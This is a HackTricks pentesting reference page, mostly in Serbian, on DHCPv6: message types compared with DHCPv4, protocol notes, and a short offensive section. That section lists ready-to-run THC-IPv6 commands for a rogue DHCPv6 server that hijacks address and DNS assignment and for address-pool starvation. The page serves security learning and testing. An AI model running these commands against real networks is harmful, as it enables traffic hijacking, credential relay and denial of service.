DHCPv6
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
DHCPv6 vs. DHCPv4 Message Types Comparison
A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below:
| DHCPv6 Message Type | DHCPv4 Message Type |
|---|---|
| Solicit (1) | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER |
| Request (3), Renew (5), Rebind (6) | DHCPREQUEST |
| Reply (7) | DHCPACK / DHCPNAK |
| Release (8) | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM |
| Decline (9) | DHCPDECLINE |
| Confirm (4) | nema |
| Reconfigure (10) | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | nema |
Detaljno objašnjenje tipova DHCPv6 poruka:
- Solicit (1): Pokreće ga DHCPv6 klijent da pronađe dostupne servere.
- Advertise (2): Šalju serveri kao odgovor na Solicit, pokazujući dostupnost za DHCP uslugu.
- Request (3): Klijenti koriste ovo da zatraže IP adrese ili prefikse od specifičnog servera.
- Confirm (4): Koristi ga klijent da proveri da li su dodeljene adrese i dalje validne na mreži, obično nakon promene mreže.
- Renew (5): Klijenti šalju ovo originalnom serveru da produže životni vek adresa ili ažuriraju konfiguracije.
- Rebind (6): Šalje se bilo kojem serveru da bi se produžio životni vek adresa ili ažurirale konfiguracije, posebno kada nema odgovora na Renew.
- Reply (7): Serveri koriste ovo da dodele adrese, konfiguracione parametre, ili da potvrde poruke poput Release ili Decline.
- Release (8): Klijenti obaveštavaju server da prestanu koristiti jednu ili više dodeljenih adresa.
- Decline (9): Klijenti šalju ovo da prijave da su dodeljene adrese u konfliktu na mreži.
- Reconfigure (10): Serveri podstiču klijente da započnu transakcije za nove ili ažurirane konfiguracije.
- Information-Request (11): Klijenti traže konfiguracione parametre bez dodele IP adrese.
- Relay-Forw (12): Relay agenti prosleđuju poruke serverima.
- Relay-Repl (13): Serveri odgovaraju relay agentima, koji zatim isporučuju poruku klijentu.
Brze napomene o protokolu (Ofanzivno)
- DHCPv6 klijenti koriste UDP port
546, a serveri/relay agenti koriste UDP port547. - Klijenti šalju Solicit na All_DHCP_Relay_Agents_and_Servers (
ff02::1:2); serveri/relay agenti slušaju tamo. All_DHCP_Servers jeff05::1:3. - Identiteti klijenta i servera nose se u
OPTION_CLIENTIDiOPTION_SERVERIDkoristeći DUIDs. Ovo je korisno za fingerprinting istog hosta preko promena adresa. - Dodela adrese se zahteva sa
IA_NA(non-temporary address) i delegiranje prefiksa saIA_PD(downstream router prefix).
Brzi Recon
# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'
# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>
Rogue DHCPv6 Server (Address/DNS Hijack)
# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>
Ovo je generički on-link rogue DHCPv6 server. Na Windows/AD mrežama, uparite ovaj sa higher-level relays (pogledajte IPv6 stranicu) ako želite NTLM relay primitives.
Pool Exhaustion / DHCPv6 Starvation
# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>
Napomena o Reconfigure porukama
DHCPv6 Reconfigure se ne prihvata bez razmišljanja: klijenti ga prihvataju samo ako su eksplicitno poslali OPTION_RECONF_ACCEPT. Po defaultu, klijent je nevoljan da prihvati Reconfigure poruke, pa nepouzdani Reconfigure napadi često ne uspevaju osim ako ne posmatrate/izazovete tu opciju.
Reference
-
https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.


